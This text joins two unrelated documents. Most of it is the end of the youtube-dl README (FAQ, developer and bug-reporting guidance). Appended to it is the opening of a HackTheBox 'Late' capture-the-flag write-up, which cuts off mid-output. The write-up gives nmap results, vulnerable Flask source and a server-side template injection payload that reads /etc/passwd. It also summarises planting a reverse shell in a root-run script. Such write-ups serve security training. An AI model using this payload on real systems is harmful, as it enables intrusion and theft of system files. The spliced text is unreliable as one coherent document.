[ffmpeg](https://www.ffmpeg.org/). On some sites - most notably YouTube - videos can be retrieved in a higher quality format without sound. youtube-dl will detect whether avconv/ffmpeg is present and automatically pick the best option. Videos or video formats streamed via RTMP protocol can only be downloaded when [rtmpdump](https://rtmpdump.mplayerhq.hu/) is installed. Downloading MMS and RTSP videos requires either [mplayer](https://mplayerhq.hu/) or [mpv](https://mpv.io/) to be installed. ### I have downloaded a video but how can I play it? Once the video is fully downloaded, use any video player, such as [mpv](https://mpv.io/), [vlc](https://www.videolan.org/) or [mplayer](https://www.mplayerhq.hu/). ### I extracted a video URL with `-g`, but it does not play on another machine / in my web browser. It depends a lot on the service. In many cases, requests for the video (to download/play it) must come from the same IP address and with the same cookies and/or HTTP headers. Use the `--cookies` option to write the required cookies into a file, and advise your downloader to read cookies from that file. Some sites also require a common user agent to be used, use `--dump-user-agent` to see the one in use by youtube-dl. You can also get necessary cookies and HTTP headers from JSON output obtained with `--dump-json`. It may be beneficial to use IPv6; in some cases, the restrictions are only applied to IPv4. Some services (sometimes only for a subset of videos) do not restrict the video URL by IP address, cookie, or user-agent, but these are the exception rather than the rule. Please bear in mind that some URL protocols are **not** supported by browsers out of the box, including RTMP. If you are using `-g`, your own downloader must support these as well. If you want to play the video on a machine that is not running youtube-dl, you can relay the video content from the machine that runs youtube-dl. You can use `-o -` to let youtube-dl stream a video to stdout, or simply allow the player to download the files written by youtube-dl in turn. ### ERROR: no fmt_url_map or conn information found in video info YouTube has switched to a new video info format in July 2011 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl. ### ERROR: unable to download video YouTube requires an additional signature since September 2012 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl. ### Video URL contains an ampersand and I'm getting some strange output `[1] 2839` or `'v' is not recognized as an internal or external command` That's actually the output from your shell. Since ampersand is one of the special shell characters it's interpreted by the shell preventing you from passing the whole URL to youtube-dl. To disable your shell from interpreting the ampersands (or any other special characters) you have to either put the whole URL in quotes or escape them with a backslash (which approach will work depends on your shell). For example if your URL is https://www.youtube.com/watch?t=4&v=BaW_jenozKc you should end up with following command: ```youtube-dl 'https://www.youtube.com/watch?t=4&v=BaW_jenozKc'``` or ```youtube-dl https://www.youtube.com/watch?t=4\&v=BaW_jenozKc``` For Windows you have to use the double quotes: ```youtube-dl "https://www.youtube.com/watch?t=4&v=BaW_jenozKc"``` ### ExtractorError: Could not find JS function u'OF' In February 2015, the new YouTube player contained a character sequence in a string that was misinterpreted by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl. ### HTTP Error 429: Too Many Requests or 402: Payment Required These two error codes indicate that the service is blocking your IP address because of overuse. Contact the service and ask them to unblock your IP address, or - if you have acquired a whitelisted IP address already - use the [`--proxy` or `--source-address` options](#network-options) to select another IP address. ### SyntaxError: Non-ASCII character The error File "youtube-dl", line 2 SyntaxError: Non-ASCII character '\x93' ... means you're using an outdated version of Python. Please update to Python 2.6 or 2.7. ### What is this binary file? Where has the code gone? Since June 2012 ([#342](https://github.com/rg3/youtube-dl/issues/342)) youtube-dl is packed as an executable zipfile, simply unzip it (might need renaming to `youtube-dl.zip` first on some systems) or clone the git repository, as laid out above. If you modify the code, you can run it by executing the `__main__.py` file. To recompile the executable, run `make youtube-dl`. ### The exe throws an error due to missing `MSVCR100.dll` To run the exe you need to install first the [Microsoft Visual C++ 2010 Redistributable Package (x86)](https://www.microsoft.com/en-US/download/details.aspx?id=5555). ### On Windows, how should I set up ffmpeg and youtube-dl? Where should I put the exe files? If you put youtube-dl and ffmpeg in the same directory that you're running the command from, it will work, but that's rather cumbersome. To make a different directory work - either for ffmpeg, or for youtube-dl, or for both - simply create the directory (say, `C:\bin`, or `C:\Users\<User name>\bin`), put all the executables directly in there, and then [set your PATH environment variable](https://www.java.com/en/download/help/path.xml) to include that directory. From then on, after restarting your shell, you will be able to access both youtube-dl and ffmpeg (and youtube-dl will be able to find ffmpeg) by simply typing `youtube-dl` or `ffmpeg`, no matter what directory you're in. ### How do I put downloads into a specific folder? Use the `-o` to specify an [output template](#output-template), for example `-o "/home/user/videos/%(title)s-%(id)s.%(ext)s"`. If you want this for all of your downloads, put the option into your [configuration file](#configuration). ### How do I download a video starting with a `-`? Either prepend `https://www.youtube.com/watch?v=` or separate the ID from the options with `--`: youtube-dl -- -wNyEUrxzFU youtube-dl "https://www.youtube.com/watch?v=-wNyEUrxzFU" ### How do I pass cookies to youtube-dl? Use the `--cookies` option, for example `--cookies /path/to/cookies/file.txt`. In order to extract cookies from browser use any conforming browser extension for exporting cookies. For example, [cookies.txt](https://chrome.google.com/webstore/detail/cookiestxt/njabckikapfpffapmjgojcnbfjonfjfg) (for Chrome) or [cookies.txt](https://addons.mozilla.org/en-US/firefox/addon/cookies-txt/) (for Firefox). Note that the cookies file must be in Mozilla/Netscape format and the first line of the cookies file must be either `# HTTP Cookie File` or `# Netscape HTTP Cookie File`. Make sure you have correct [newline format](https://en.wikipedia.org/wiki/Newline) in the cookies file and convert newlines if necessary to correspond with your OS, namely `CRLF` (`\r\n`) for Windows and `LF` (`\n`) for Unix and Unix-like systems (Linux, macOS, etc.). `HTTP Error 400: Bad Request` when using `--cookies` is a good sign of invalid newline format. Passing cookies to youtube-dl is a good way to workaround login when a particular extractor does not implement it explicitly. Another use case is working around [CAPTCHA](https://en.wikipedia.org/wiki/CAPTCHA) some websites require you to solve in particular cases in order to get access (e.g. YouTube, CloudFlare). ### How do I stream directly to media player? You will first need to tell youtube-dl to stream media to stdout with `-o -`, and also tell your media player to read from stdin (it must be capable of this for streaming) and then pipe former to latter. For example, streaming to [vlc](https://www.videolan.org/) can be achieved with: youtube-dl -o - "https://www.youtube.com/watch?v=BaW_jenozKcj" | vlc - ### How do I download only new videos from a playlist? Use download-archive feature. With this feature you should initially download the complete playlist with `--download-archive /path/to/download/archive/file.txt` that will record identifiers of all the videos in a special file. Each subsequent run with the same `--download-archive` will download only new videos and skip all videos that have been downloaded before. Note that only successful downloads are recorded in the file. For example, at first, youtube-dl --download-archive archive.txt "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re" will download the complete `PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re` playlist and create a file `archive.txt`. Each subsequent run will only download new videos if any: youtube-dl --download-archive archive.txt "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re" ### Should I add `--hls-prefer-native` into my config? When youtube-dl detects an HLS video, it can download it either with the built-in downloader or ffmpeg. Since many HLS streams are slightly invalid and ffmpeg/youtube-dl each handle some invalid cases better than the other, there is an option to switch the downloader if needed. When youtube-dl knows that one particular downloader works better for a given website, that downloader will be picked. Otherwise, youtube-dl will pick the best downloader for general compatibility, which at the moment happens to be ffmpeg. This choice may change in future versions of youtube-dl, with improvements of the built-in downloader and/or ffmpeg. In particular, the generic extractor (used when your website is not in the [list of supported sites by youtube-dl](https://rg3.github.io/youtube-dl/supportedsites.html) cannot mandate one specific downloader. If you put either `--hls-prefer-native` or `--hls-prefer-ffmpeg` into your configuration, a different subset of videos will fail to download correctly. Instead, it is much better to [file an issue](https://yt-dl.org/bug) or a pull request which details why the native or the ffmpeg HLS downloader is a better choice for your use case. ### Can you add support for this anime video site, or site which shows current movies for free? As a matter of policy (as well as legality), youtube-dl does not include support for services that specialize in infringing copyright. As a rule of thumb, if you cannot easily find a video that the service is quite obviously allowed to distribute (i.e. that has been uploaded by the creator, the creator's distributor, or is published under a free license), the service is probably unfit for inclusion to youtube-dl. A note on the service that they don't host the infringing content, but just link to those who do, is evidence that the service should **not** be included into youtube-dl. The same goes for any DMCA note when the whole front page of the service is filled with videos they are not allowed to distribute. A "fair use" note is equally unconvincing if the service shows copyright-protected videos in full without authorization. Support requests for services that **do** purchase the rights to distribute their content are perfectly fine though. If in doubt, you can simply include a source that mentions the legitimate purchase of content. ### How can I speed up work on my issue? (Also known as: Help, my important issue not being solved!) The youtube-dl core developer team is quite small. While we do our best to solve as many issues as possible, sometimes that can take quite a while. To speed up your issue, here's what you can do: First of all, please do report the issue [at our issue tracker](https://yt-dl.org/bugs). That allows us to coordinate all efforts by users and developers, and serves as a unified point. Unfortunately, the youtube-dl project has grown too large to use personal email as an effective communication channel. Please read the [bug reporting instructions](#bugs) below. A lot of bugs lack all the necessary information. If you can, offer proxy, VPN, or shell access to the youtube-dl developers. If you are able to, test the issue from multiple computers in multiple countries to exclude local censorship or misconfiguration issues. If nobody is interested in solving your issue, you are welcome to take matters into your own hands and submit a pull request (or coerce/pay somebody else to do so). Feel free to bump the issue from time to time by writing a small comment ("Issue is still present in youtube-dl version ...from France, but fixed from Belgium"), but please not more than once a month. Please do not declare your issue as `important` or `urgent`. ### How can I detect whether a given URL is supported by youtube-dl? For one, have a look at the [list of supported sites](docs/supportedsites.md). Note that it can sometimes happen that the site changes its URL scheme (say, from https://example.com/video/1234567 to https://example.com/v/1234567 ) and youtube-dl reports an URL of a service in that list as unsupported. In that case, simply report a bug. It is *not* possible to detect whether a URL is supported or not. That's because youtube-dl contains a generic extractor which matches **all** URLs. You may be tempted to disable, exclude, or remove the generic extractor, but the generic extractor not only allows users to extract videos from lots of websites that embed a video from another service, but may also be used to extract video from a service that it's hosting itself. Therefore, we neither recommend nor support disabling, excluding, or removing the generic extractor. If you want to find out whether a given URL is supported, simply call youtube-dl with it. If you get no videos back, chances are the URL is either not referring to a video or unsupported. You can find out which by examining the output (if you run youtube-dl on the console) or catching an `UnsupportedError` exception if you run it from a Python program. # Why do I need to go through that much red tape when filing bugs? Before we had the issue template, despite our extensive [bug reporting instructions](#bugs), about 80% of the issue reports we got were useless, for instance because people used ancient versions hundreds of releases old, because of simple syntactic errors (not in youtube-dl but in general shell usage), because the problem was already reported multiple times before, because people did not actually read an error message, even if it said "please install ffmpeg", because people did not mention the URL they were trying to download and many more simple, easy-to-avoid problems, many of whom were totally unrelated to youtube-dl. youtube-dl is an open-source project manned by too few volunteers, so we'd rather spend time fixing bugs where we are certain none of those simple problems apply, and where we can be reasonably confident to be able to reproduce the issue without asking the reporter repeatedly. As such, the output of `youtube-dl -v YOUR_URL_HERE` is really all that's required to file an issue. The issue template also guides you through some basic steps you can do, such as checking that your version of youtube-dl is current. # DEVELOPER INSTRUCTIONS Most users do not need to build youtube-dl and can [download the builds](https://rg3.github.io/youtube-dl/download.html) or get them from their distribution. To run youtube-dl as a developer, you don't need to build anything either. Simply execute python -m youtube_dl To run the test, simply invoke your favorite test runner, or execute a test file directly; any of the following work: python -m unittest discover python test/test_download.py nosetests See item 6 of [new extractor tutorial](#adding-support-for-a-new-site) for how to run extractor specific test cases. If you want to create a build of youtube-dl yourself, you'll need * python * make (only GNU make is supported) * pandoc * zip * nosetests ### Adding support for a new site If you want to add support for a new site, first of all **make sure** this site is **not dedicated to [copyright infringement](README.md#can-you-add-support-for-this-anime-video-site-or-site-which-shows-current-movies-for-free)**. youtube-dl does **not support** such sites thus pull requests adding support for them **will be rejected**. After you have ensured this site is distributing its content legally, you can follow this quick list (assuming your service is called `yourextractor`): 1. [Fork this repository](https://github.com/rg3/youtube-dl/fork) 2. Check out the source code with: git clone [email protected]:YOUR_GITHUB_USERNAME/youtube-dl.git 3. Start a new git branch with cd youtube-dl git checkout -b yourextractor 4. Start with this simple template and save it to `youtube_dl/extractor/yourextractor.py`: ```python # coding: utf-8 from __future__ import unicode_literals from .common import InfoExtractor class YourExtractorIE(InfoExtractor): _VALID_URL = r'https?://(?:www\.)?yourextractor\.com/watch/(?P<id>[0-9]+)' _TEST = { 'url': 'https://yourextractor.com/watch/42', 'md5': 'TODO: md5 sum of the first 10241 bytes of the video file (use --test)', 'info_dict': { 'id': '42', 'ext': 'mp4', 'title': 'Video title goes here', 'thumbnail': r're:^https?://.*\.jpg$', # TODO more properties, either as: # * A value # * MD5 checksum; start the string with md5: # * A regular expression; start the string with re: # * Any Python type (for example int or float) } } def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) # TODO more code goes here, for example ... title = self._html_search_regex(r'<h1>(.+?)</h1>', webpage, 'title') return { 'id': video_id, 'title': title, 'description': self._og_search_description(webpage), 'uploader': self._search_regex(r'<div[^>]+id="uploader"[^>]*>([^<]+)<', webpage, 'uploader', fatal=False), # TODO more properties (see youtube_dl/extractor/common.py) } ``` 5. Add an import in [`youtube_dl/extractor/extractors.py`](https://github.com/rg3/youtube-dl/blob/master/youtube_dl/extractor/extractors.py). 6. Run `python test/test_download.py TestDownload.test_YourExtractor`. This *should fail* at first, but you can continually re-run it until you're done. If you decide to add more than one test, then rename ``_TEST`` to ``_TESTS`` and make it into a list of dictionaries. The tests will then be named `TestDownload.test_YourExtractor`, `TestDownload.test_YourExtractor_1`, `TestDownload.test_YourExtractor_2`, etc. Note that tests with `only_matching` key in test's dict are not counted in. 7. Have a look at [`youtube_dl/extractor/common.py`](https://github.com/rg3/youtube-dl/blob/master/youtube_dl/extractor/common.py) for possible helper methods and a [detailed description of what your extractor should and may return](https://github.com/rg3/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L94-L303). Add tests and code for as many as you want. 8. Make sure your code follows [youtube-dl coding conventions](#youtube-dl-coding-conventions) and check the code with [flake8](http://flake8.pycqa.org/en/latest/index.html#quickstart): $ flake8 youtube_dl/extractor/yourextractor.py 9. Make sure your code works under all [Python](https://www.python.org/) versions claimed supported by youtube-dl, namely 2.6, 2.7, and 3.2+. 10. When the tests pass, [add](https://git-scm.com/docs/git-add) the new files and [commit](https://git-scm.com/docs/git-commit) them and [push](https://git-scm.com/docs/git-push) the result, like this: $ git add youtube_dl/extractor/extractors.py $ git add youtube_dl/extractor/yourextractor.py $ git commit -m '[yourextractor] Add new extractor' $ git push origin yourextractor 11. Finally, [create a pull request](https://help.github.com/articles/creating-a-pull-request). We'll then review and merge it. In any case, thank you very much for your contributions! ## youtube-dl coding conventions This section introduces a guide lines for writing idiomatic, robust and future-proof extractor code. Extractors are very fragile by nature since they depend on the layout of the source data provided by 3rd party media hosters out of your control and this layout tends to change. As an extractor implementer your task is not only to write code that will extract media links and metadata correctly but also to minimize dependency on the source's layout and even to make the code foresee potential future changes and be ready for that. This is important because it will allow the extractor not to break on minor layout changes thus keeping old youtube-dl versions working. Even though this breakage issue is easily fixed by emitting a new version of youtube-dl with a fix incorporated, all the previous versions become broken in all repositories and distros' packages that may not be so prompt in fetching the update from us. Needless to say, some non rolling release distros may never receive an update at all. ### Mandatory and optional metafields For extraction to work youtube-dl relies on metadata your extractor extracts and provides to youtube-dl expressed by an [information dictionary](https://github.com/rg3/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L94-L303) or simply *info dict*. Only the following meta fields in the *info dict* are considered mandatory for a successful extraction process by youtube-dl: - `id` (media identifier) - `title` (media title) - `url` (media download URL) or `formats` In fact only the last option is technically mandatory (i.e. if you can't figure out the download location of the media the extraction does not make any sense). But by convention youtube-dl also treats `id` and `title` as mandatory. Thus the aforementioned metafields are the critical data that the extraction does not make any sense without and if any of them fail to be extracted then the extractor is considered completely broken. [Any field](https://github.com/rg3/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L188-L303) apart from the aforementioned ones are considered **optional**. That means that extraction should be **tolerant** to situations when sources for these fields can potentially be unavailable (even if they are always available at the moment) and **future-proof** in order not to break the extraction of general purpose mandatory fields. #### Example Say you have some source dictionary `meta` that you've fetched as JSON with HTTP request and it has a key `summary`: ```python meta = self._download_json(url, video_id) ``` Assume at this point `meta`'s layout is: ```python { ... "summary": "some fancy summary text", ... } ``` Assume you want to extract `summary` and put it into the resulting info dict as `description`. Since `description` is an optional meta field you should be ready that this key may be missing from the `meta` dict, so that you should extract it like: ```python description = meta.get('summary') # correct ``` and not like: ```python description = meta['summary'] # incorrect ``` The latter will break extraction process with `KeyError` if `summary` disappears from `meta` at some later time but with the former approach extraction will just go ahead with `description` set to `None` which is perfectly fine (remember `None` is equivalent to the absence of data). Similarly, you should pass `fatal=False` when extracting optional data from a webpage with `_search_regex`, `_html_search_regex` or similar methods, for instance: ```python description = self._search_regex( r'<span[^>]+id="title"[^>]*>([^<]+)<', webpage, 'description', fatal=False) ``` With `fatal` set to `False` if `_search_regex` fails to extract `description` it will emit a warning and continue extraction. You can also pass `default=<some fallback value>`, for example: ```python description = self._search_regex( r'<span[^>]+id="title"[^>]*>([^<]+)<', webpage, 'description', default=None) ``` On failure this code will silently continue the extraction with `description` set to `None`. That is useful for metafields that may or may not be present. ### Provide fallbacks When extracting metadata try to do so from multiple sources. For example if `title` is present in several places, try extracting from at least some of them. This makes it more future-proof in case some of the sources become unavailable. #### Example Say `meta` from the previous example has a `title` and you are about to extract it. Since `title` is a mandatory meta field you should end up with something like: ```python title = meta['title'] ``` If `title` disappears from `meta` in future due to some changes on the hoster's side the extraction would fail since `title` is mandatory. That's expected. Assume that you have some another source you can extract `title` from, for example `og:title` HTML meta of a `webpage`. In this case you can provide a fallback scenario: ```python title = meta.get('title') or self._og_search_title(webpage) ``` This code will try to extract from `meta` first and if it fails it will try extracting `og:title` from a `webpage`. ### Regular expressions #### Don't capture groups you don't use Capturing group must be an indication that it's used somewhere in the code. Any group that is not used must be non capturing. ##### Example Don't capture id attribute name here since you can't use it for anything anyway. Correct: ```python r'(?:id|ID)=(?P<id>\d+)' ``` Incorrect: ```python r'(id|ID)=(?P<id>\d+)' ``` #### Make regular expressions relaxed and flexible When using regular expressions try to write them fuzzy, relaxed and flexible, skipping insignificant parts that are more likely to change, allowing both single and double quotes for quoted values and so on. ##### Example Say you need to extract `title` from the following HTML code: ```html <span style="position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;" class="title">some fancy title</span> ``` The code for that task should look similar to: ```python title = self._search_regex( r'<span[^>]+class="title"[^>]*>([^<]+)', webpage, 'title') ``` Or even better: ```python title = self._search_regex( r'<span[^>]+class=(["\'])title\1[^>]*>(?P<title>[^<]+)', webpage, 'title', group='title') ``` Note how you tolerate potential changes in the `style` attribute's value or switch from using double quotes to single for `class` attribute: The code definitely should not look like: ```python title = self._search_regex( r'<span style="position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;" class="title">(.*?)</span>', webpage, 'title', group='title') ``` ### Long lines policy There is a soft limit to keep lines of code under 80 characters long. This means it should be respected if possible and if it does not make readability and code maintenance worse. For example, you should **never** split long string literals like URLs or some other often copied entities over multiple lines to fit this limit: Correct: ```python 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4' ``` Incorrect: ```python 'https://www.youtube.com/watch?v=FqZTN594JQw&list=' 'PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4' ``` ### Use convenience conversion and parsing functions Wrap all extracted numeric data into safe functions from [`youtube_dl/utils.py`](https://github.com/rg3/youtube-dl/blob/master/youtube_dl/utils.py): `int_or_none`, `float_or_none`. Use them for string to number conversions as well. Use `url_or_none` for safe URL processing. Use `try_get` for safe metadata extraction from parsed JSON. Use `unified_strdate` for uniform `upload_date` or any `YYYYMMDD` meta field extraction, `unified_timestamp` for uniform `timestamp` extraction, `parse_filesize` for `filesize` extraction, `parse_count` for count meta fields extraction, `parse_resolution`, `parse_duration` for `duration` extraction, `parse_age_limit` for `age_limit` extraction. Explore [`youtube_dl/utils.py`](https://github.com/rg3/youtube-dl/blob/master/youtube_dl/utils.py) for more useful convenience functions. #### More examples ##### Safely extract optional description from parsed JSON ```python description = try_get(response, lambda x: x['result']['video'][0]['summary'], compat_str) ``` ##### Safely extract more optional metadata ```python video = try_get(response, lambda x: x['result']['video'][0], dict) or {} description = video.get('summary') duration = float_or_none(video.get('durationMs'), scale=1000) view_count = int_or_none(video.get('views')) ``` # EMBEDDING YOUTUBE-DL youtube-dl makes the best effort to be a good command-line program, and thus should be callable from any programming language. If you encounter any problems parsing its output, feel free to [create a report](https://github.com/rg3/youtube-dl/issues/new). From a Python program, you can embed youtube-dl in a more powerful fashion, like this: ```python from __future__ import unicode_literals import youtube_dl ydl_opts = {} with youtube_dl.YoutubeDL(ydl_opts) as ydl: ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc']) ``` Most likely, you'll want to use various options. For a list of options available, have a look at [`youtube_dl/YoutubeDL.py`](https://github.com/rg3/youtube-dl/blob/3e4cedf9e8cd3157df2457df7274d0c842421945/youtube_dl/YoutubeDL.py#L137-L312). For a start, if you want to intercept youtube-dl's output, set a `logger` object. Here's a more complete example of a program that outputs only errors (and a short message after the download is finished), and downloads/converts the video to an mp3 file: ```python from __future__ import unicode_literals import youtube_dl class MyLogger(object): def debug(self, msg): pass def warning(self, msg): pass def error(self, msg): print(msg) def my_hook(d): if d['status'] == 'finished': print('Done downloading, now converting ...') ydl_opts = { 'format': 'bestaudio/best', 'postprocessors': [{ 'key': 'FFmpegExtractAudio', 'preferredcodec': 'mp3', 'preferredquality': '192', }], 'logger': MyLogger(), 'progress_hooks': [my_hook], } with youtube_dl.YoutubeDL(ydl_opts) as ydl: ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc']) ``` # BUGS Bugs and suggestions should be reported at: <https://github.com/rg3/youtube-dl/issues>. Unless you were prompted to or there is another pertinent reason (e.g. GitHub fails to accept the bug report), please do not send bug reports via personal email. For discussions, join us in the IRC channel [#youtube-dl](irc://chat.freenode.net/#youtube-dl) on freenode ([webchat](https://webchat.freenode.net/?randomnick=1&channels=youtube-dl)). **Please include the full output of youtube-dl when run with `-v`**, i.e. **add** `-v` flag to **your command line**, copy the **whole** output and post it in the issue body wrapped in \`\`\` for better formatting. It should look similar to this: ``` $ youtube-dl -v <your command line> [debug] System config: [] [debug] User config: [] [debug] Command-line args: [u'-v', u'https://www.youtube.com/watch?v=BaW_jenozKcj'] [debug] Encodings: locale cp1251, fs mbcs, out cp866, pref cp1251 [debug] youtube-dl version 2015.12.06 [debug] Git HEAD: 135392e [debug] Python version 2.6.6 - Windows-2003Server-5.2.3790-SP2 [debug] exe versions: ffmpeg N-75573-g1d0487f, ffprobe N-75573-g1d0487f, rtmpdump 2.4 [debug] Proxy map: {} ... ``` **Do not post screenshots of verbose logs; only plain text is acceptable.** The output (including the first lines) contains important debugging information. Issues without the full output are often not reproducible and therefore do not get solved in short order, if ever. Please re-read your issue once again to avoid a couple of common mistakes (you can and should use this as a checklist): ### Is the description of the issue itself sufficient? We often get issue reports that we cannot really decipher. While in most cases we eventually get the required information after asking back multiple times, this poses an unnecessary drain on our resources. Many contributors, including myself, are also not native speakers, so we may misread some parts. So please elaborate on what feature you are requesting, or what bug you want to be fixed. Make sure that it's obvious - What the problem is - How it could be fixed - How your proposed solution would look like If your report is shorter than two lines, it is almost certainly missing some of these, which makes it hard for us to respond to it. We're often too polite to close the issue outright, but the missing info makes misinterpretation likely. As a committer myself, I often get frustrated by these issues, since the only possible way for me to move forward on them is to ask for clarification over and over. For bug reports, this means that your report should contain the *complete* output of youtube-dl when called with the `-v` flag. The error message you get for (most) bugs even says so, but you would not believe how many of our bug reports do not contain this information. If your server has multiple IPs or you suspect censorship, adding `--call-home` may be a good idea to get more diagnostics. If the error is `ERROR: Unable to extract ...` and you cannot reproduce it from multiple countries, add `--dump-pages` (warning: this will yield a rather large output, redirect it to the file `log.txt` by adding `>log.txt 2>&1` to your command-line) or upload the `.dump` files you get when you add `--write-pages` [somewhere](https://gist.github.com/). **Site support requests must contain an example URL**. An example URL is a URL you might want to download, like `https://www.youtube.com/watch?v=BaW_jenozKc`. There should be an obvious video present. Except under very special circumstances, the main page of a video service (e.g. `https://www.youtube.com/`) is *not* an example URL. ### Are you using the latest version? Before reporting any issue, type `youtube-dl -U`. This should report that you're up-to-date. About 20% of the reports we receive are already fixed, but people are using outdated versions. This goes for feature requests as well. ### Is the issue already documented? Make sure that someone has not already opened the issue you're trying to open. Search at the top of the window or browse the [GitHub Issues](https://github.com/rg3/youtube-dl/search?type=Issues) of this repository. If there is an issue, feel free to write something along the lines of "This affects me as well, with version 2015.01.01. Here is some more information on the issue: ...". While some issues may be old, a new post into them often spurs rapid activity. ### Why are existing options not enough? Before requesting a new feature, please have a quick peek at [the list of supported options](https://github.com/rg3/youtube-dl/blob/master/README.md#options). Many feature requests are for features that actually exist already! Please, absolutely do show off your work in the issue report and detail how the existing similar options do *not* solve your problem. ### Is there enough context in your bug report? People want to solve problems, and often think they do us a favor by breaking down their larger problems (e.g. wanting to skip already downloaded files) to a specific request (e.g. requesting us to look whether the file exists before downloading the info page). However, what often happens is that they break down the problem into two steps: One simple, and one impossible (or extremely complicated one). We are then presented with a very complicated request when the original problem could be solved far easier, e.g. by recording the downloaded video IDs in a separate file. To avoid this, you must include the greater context where it is non-obvious. In particular, every feature request that does not consist of adding support for a new site should contain a use case scenario that explains in what situation the missing feature would be useful. ### Does the issue involve one problem, and one problem only? Some of our users seem to think there is a limit of issues they can or should open. There is no limit of issues they can or should open. While it may seem appealing to be able to dump all your issues into one ticket, that means that someone who solves one of your issues cannot mark the issue as closed. Typically, reporting a bunch of issues leads to the ticket lingering since nobody wants to attack that behemoth, until someone mercifully splits the issue into multiple ones. In particular, every site support request issue should only pertain to services at one site (generally under a common domain, but always using the same backend technology). Do not request support for vimeo user videos, White house podcasts, and Google Plus pages in the same issue. Also, make sure that you don't post bug reports alongside feature requests. As a rule of thumb, a feature request does not include outputs of youtube-dl that are not immediately related to the feature at hand. Do not post reports of a network error alongside the request for a new video service. ### Is anyone going to need the feature? Only post features that you (or an incapacitated friend you can personally talk to) require. Do not post features because they seem like a good idea. If they are really useful, they will be requested by someone who requires them. ### Is your question about youtube-dl? It may sound strange, but some bug reports we receive are completely unrelated to youtube-dl and relate to a different, or even the reporter's own, application. Please make sure that you are actually using youtube-dl. If you are using a UI for youtube-dl, report the bug to the maintainer of the actual application providing the UI. On the other hand, if your UI for youtube-dl fails in some way you believe is related to youtube-dl, by all means, go ahead and report the bug. # COPYRIGHT youtube-dl is released into the public domain by the copyright holders. This README file was originally written by [Daniel Bolton](https://github.com/dbbolton) and is likewise released into the public domain.
# Late - HackTheBox - Writeup Linux, 20 Base Points, Easy ![info.JPG](images/info.JPG) ## Machine ![‏‏Late.JPG](images/Late.JPG) ## TL;DR To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22``` and ```80```. ***User***: Found another subdomain ```images.late.htb``` which extracts text from images (OCR), By observing the source code (from Github) we found the capability to RCE, Using that we read the SSH key of ```svc_acc ``` user. ***Root***: Found script ```/usr/local/sbin/ssh-alert.sh``` with write permission, This script runs for every SSH login, Add to this script reverse shell and we get a reverse shell as ```root```. ![pwn.JPG](images/pwn.JPG) ## Late Solution ### User Let's start with ```nmap``` scanning: ```console ┌─[evyatar@parrot]─[/hackthebox/Late] └──╼ $ nmap -sV -sC -oA nmap/Late 10.10.11.156 Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-29 15:23 IDT Nmap scan report for 10.10.11.156 Host is up (0.20s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA) | 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA) |_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Late - Best online image tools Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` By observing port 80 we get the following web page: ![port80.JPG](images/port80.JPG) At the bottom of the page, we can see the following link ```late free online photo editor``` which is [http://images.late.htb/](http://images.late.htb/): ![photoedit.JPG](images/photoedit.JPG) Let's add ```images.late.htb``` to ```/etc/hosts``` and browse it: ![imageslate.JPG](images/imageslate.JPG) The application is based on [https://github.com/lucadibello/ImageReader](https://github.com/lucadibello/ImageReader). By reading the [main.py](https://raw.githubusercontent.com/lucadibello/ImageReader/master/main.py) we can see: ```python import datetime import io import pytesseract from PIL import Image from flask import Flask, request, render_template, redirect, url_for, session app = Flask(__name__) # Secret key for sessions encryption app.secret_key = b'_5#y2L"F4Q8z\n\xec]/' @app.route('/') def home(): return render_template("index.html", title="Image Reader") @app.route('/scanner', methods=['GET', 'POST']) def scan_file(): if request.method == 'POST': start_time = datetime.datetime.now() image_data = request.files['file'].read() scanned_text = pytesseract.image_to_string(Image.open(io.BytesIO(image_data))) print("Found data:", scanned_text) session['data'] = { "text": scanned_text, "time": str((datetime.datetime.now() - start_time).total_seconds()) } return redirect(url_for('result')) @app.route('/result') def result(): if "data" in session: data = session['data'] return render_template( "result.html", title="Result", time=data["time"], text=data["text"], words=len(data["text"].split(" ")) ) else: return "Wrong request method." if __name__ == '__main__': # Setup Tesseract executable path pytesseract.pytesseract.tesseract_cmd = r'D:\TesseractOCR\tesseract' app.run(debug=True) ``` As we can on ```/result``` route - it takes the extracted data from the image and calls it to ```render_template``` function. In Flask, we can run code in HTML by using ```{% <PYTHON CODE> %}``` tag, Let's create an image that contains ```{% print("hi"} %}``` for POC: ![poc.JPG](images/poc.JPG) And by uploading it we get the following result: ``` <p>Hi</p> ``` Meaning that we can run ```python``` code from the image. Let's run the following payload to get ```/etc/passwd``` file: ```python {{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} ``` ![passwd.png](images/passwd.png) And we get: ```console 